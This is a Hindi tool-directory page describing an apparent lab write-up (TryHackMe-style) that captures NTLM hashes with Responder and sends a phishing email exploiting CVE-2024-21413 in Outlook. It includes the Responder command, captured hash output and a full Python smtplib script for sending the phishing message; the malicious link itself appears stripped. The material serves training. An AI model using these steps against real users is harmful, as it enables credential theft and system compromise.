Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Project-NTLM-Hash-Capture-and-Phishing-Email-Exploitation-for-CVE-2024-21413 — Responder के माध्यम से NTLM हैश कैप्चर करने और CVE-2024-21413 का शोषण करने वाले फ़िशिंग ईमेल निष्पादित करके सिस्टम से समझौता करने का प्रदर्शन। | Kitploit
उपकरण/GitHubGitHub/artemcyberlab/project-ntlm-hash-capture-and-phishing-email-exploitation-for-cve-2024-21413
OSINT (खुला स्रोत खुफिया)पासवर्ड क्रैकिंगटोहीशोषणफिशिंगसामाजिक इंजीनियरिंगलर्निंग और शिक्षालैब और अभ्यास
GitHub

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
artemcyberlab/project-ntlm-hash-capture-and-phishing-email-exploitation-for-cve-2024-21413

Project-NTLM-Hash-Capture-and-Phishing-Email-Exploitation-for-CVE-2024-21413

Responder के माध्यम से NTLM हैश कैप्चर करने और CVE-2024-21413 का शोषण करने वाले फ़िशिंग ईमेल निष्पादित करके सिस्टम से समझौता करने का प्रदर्शन।

रिपॉजिटरी देखें
91 साल पहलेअभी तक समीक्षित नहीं

परियोजना का उद्देश्य: यह परियोजना नेटवर्क पर उपयोगकर्ताओं से NTLM हैश कैप्चर करने और ईमेल के माध्यम से फिशिंग हमले करने के लिए विभिन्न उपकरणों के उपयोग को प्रदर्शित करने के लिए बनाई गई थी। यह दिखाता है कि नेटवर्क प्रमाणीकरण कमजोरियों और फिशिंग विधियों का उपयोग करके सिस्टम से समझौता कैसे किया जा सकता है।

प्रक्रिया विवरण

  1. Responder का उपयोग करके NTLM हैश कैप्चर करना प्रारंभ में, मैंने नेटवर्क पर प्रमाणीकरण हैश कैप्चर करने के लिए Responder टूल का उपयोग किया। Responder LLMNR, NBT-NS, और MDNS जैसी क्वेरी को इंटरसेप्ट करके उपयोगकर्ताओं के NTLM हैश एकत्र करने की अनुमति देता है। यह उन हमलों के लिए एक महत्वपूर्ण कदम है जिनका उद्देश्य कैप्चर किए गए हैश का उपयोग करके सिस्टम तक पहुँच प्राप्त करना है।

मैंने Responder प्रारंभ करने के लिए निम्नलिखित कमांड चलाया:

root@ip-10-10-192-145:~# sudo responder -I ens5

मैंने Responder को ens5 इंटरफ़ेस पर सुनने के लिए कॉन्फ़िगर किया। इसने तुरंत प्रमाणीकरण अनुरोधों को इंटरसेप्ट करना शुरू कर दिया, जिससे मैं नेटवर्क पर उपयोगकर्ताओं से NTLM हैश देख सका, जैसे THM-MONIKERLINK\tryhackme और WORKGROUP\Administrator। जब हैश कैप्चर हो रहे थे तब आउटपुट इस तरह दिखता था:

[SMB] NTLMv2-SSP Client : ::ffff:10.10.251.212 [SMB] NTLMv2-SSP Username : THM-MONIKERLINK\tryhackme [SMB] NTLMv2-SSP Hash : tryhackme::THM-MONIKERLINK:0b8bfa4ac2e8a954:4E86E98E55FBE019FB31815DDD4445DB

इन हैश का उपयोग ब्रूट फोर्स या हैश हमलों जैसे हमलों के लिए किया जा सकता है।

  1. एक्सप्लॉइट के साथ फिशिंग ईमेल इसके बाद, मैंने एक दुर्भावनापूर्ण फ़ाइल के लिंक वाला एक फिशिंग ईमेल बनाया। smtplib लाइब्रेरी के साथ एक Python स्क्रिप्ट का उपयोग करके, मैंने पीड़ित के पते पर ईमेल भेजा। ईमेल में एक HTML लिंक शामिल था जो सुरक्षित दिखता था लेकिन वास्तव में एक ऐसी फ़ाइल की ओर ले जाता था जो एक कमजोरी का शोषण करने के लिए डिज़ाइन की गई थी।

ईमेल में फिशिंग लिंक इस तरह दिखता था:

Click me

फिशिंग ईमेल भेजने के लिए उपयोग की गई पूरी Python स्क्रिप्ट यहाँ है:

import smtplib from email.mime.text import MIMEText from email.mime.multipart import MIMEMultipart from email.utils import formataddr

sender_email = '[email protected]' receiver_email = '[email protected]' password = input("Enter your attacker email password: ")

html_content = """\

Click me

"""

message = MIMEMultipart() message['Subject'] = "CVE-2024-21413" message["From"] = formataddr(('CMNatic', sender_email)) message["To"] = receiver_email

msgHtml = MIMEText(html_content, 'html') message.attach(msgHtml)

server = smtplib.SMTP('10.10.251.212 ', 25) server.ehlo()

try: server.login(sender_email, password) except Exception as err: print(err) exit(-1)

try: server.sendmail(sender_email, [receiver_email], message.as_string()) print("\nEmail delivered") except Exception as error: print(error) finally: server.quit()

यह स्क्रिप्ट एक दुर्भावनापूर्ण लिंक के साथ एक ईमेल भेजती है, जो संभावित रूप से CVE-2024-21413 कमजोरी का शोषण कर सकता है।

परिणाम परिणामस्वरूप, मैं दो प्रमुख पहलुओं को प्रदर्शित करने में सक्षम था:

  • Responder टूल का उपयोग करके NTLM हैश कैप्चर करना, जो नेटवर्क प्रमाणीकरण पर हमला करने के लिए एक महत्वपूर्ण कदम है।
  • Python स्क्रिप्ट का उपयोग करके ईमेल के माध्यम से फिशिंग और कमजोरियों का शोषण करना। दुर्भावनापूर्ण लिंक वाले फिशिंग ईमेल भेजने से उपयोगकर्ताओं को धोखा दिया जा सकता है और सिस्टम से समझौता हो सकता है।

इस परियोजना ने दिखाया कि कैसे नेटवर्क कमजोरियों और फिशिंग हमलों का उपयोग करके सिस्टम तक पहुँच प्राप्त की जा सकती है। इसने मजबूत प्रमाणीकरण विधियों और ईमेल ट्रैफ़िक फ़िल्टरिंग के माध्यम से ऐसे हमलों से बचाव के महत्व को भी उजागर किया।

टूल डाउनलोड करें